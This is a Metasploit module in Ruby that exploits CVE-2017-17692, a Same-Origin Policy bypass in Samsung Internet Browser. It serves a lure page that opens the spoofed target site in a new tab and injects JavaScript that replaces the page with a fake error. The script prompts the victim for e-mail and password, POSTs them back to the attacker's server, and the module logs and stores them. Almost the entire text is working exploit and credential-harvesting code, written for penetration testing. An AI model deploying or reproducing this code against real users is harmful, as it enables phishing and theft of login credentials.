Samsung Internet Browser - SOP Bypass
Source: metasploit.com  Author: Martin  Published: 2017-12-21
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Samsung Internet Browser SOP Bypass',
        'Description'    => %q(
          This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
          Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
          By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
          credentials via a fake pop-up.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Dhiraj Mishra', # Original discovery, disclosure
          'Tod Beardsley', # Metasploit module
          'Jeffrey Martin' # Metasploit module
        ],
        'References'     => [
          [ 'CVE', '2017-17692' ],
          [ 'URL', 'http://fr.0day.today/exploit/description/28434' ]
        ],
        'DisclosureDate' => 'Nov 08 2017',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
 
    register_options([
      OptString.new('TARGET_URL', [
        true,
        'The URL to spoof origin from.',
        'http://example.com/'
      ]),
      OptString.new('CUSTOM_HTML', [
        true,
        'HTML to display to the victim.',
        'This page has moved. Please <a href="#">click here</a> to redirect your browser.'
      ])
    ])

    register_advanced_options([
      OptString.new('CUSTOM_JS', [
        false,
        "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
        ''
      ])
    ])
 
  end
 
  def run
    exploit # start http server
  end
 
  def evil_javascript
    return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
    js = <<-EOS
      setTimeout(function(){
        x.document.body.innerHTML='<h1>404 Error</h1>'+
        '<p>Oops, something went wrong.</p>';
        a=x.prompt('E-mail','');
        b=x.prompt('Password','');
        var cred=JSON.stringify({'user':a,'pass':b});
        var xmlhttp = new XMLHttpRequest;
          xmlhttp.open('POST', window.location, true);
          xmlhttp.send(cred);
        }, 3000);
    EOS
    js
  end
 
  def setup
    # Landing page served on GET; the <meta> tag belongs inside <head>.
    @html = <<-EOS
      <html>
      <head>
      <meta charset="UTF-8">
      <script>
      function go(){
        try {
          var x = window.open('#{datastore['TARGET_URL']}');
          #{evil_javascript}
        } catch(e) { }
      }
      </script>
      </head>
      <body onclick="go()">
      #{datastore['CUSTOM_HTML']}
      </body></html>
    EOS
  end
 
  def store_cred(username,password)
    credential_data = {
      origin_type: :import,
      module_fullname: self.fullname,
      filename: 'msfconsole',
      workspace_id: myworkspace_id,
      service_name: 'web_service',
      realm_value: datastore['TARGET_URL'],
      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
      private_type: :password,
      private_data: password,
      username: username
    }
    create_credential(credential_data)
  end
 
  # This assumes the default schema is being used.
  # If it's not that, it'll just display the collected POST data.
  # `cli` is the client connection passed in from on_request_uri; it was
  # previously referenced here without being in scope.
  def collect_data(cli, request)
    cred = JSON.parse(request.body)
    u = cred['user']
    p = cred['pass']
    if u.blank? || p.blank?
      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
    else
      print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
      store_cred(u,p)
    end
  end

  def on_request_uri(cli, request)
    case request.method.downcase
    when 'get' # initial connection
      print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'")
      print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}")
      send_response(cli, @html)
    when 'post' # must have fallen for it
      collect_data(cli, request)
    else
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
    end
  end
 
end
 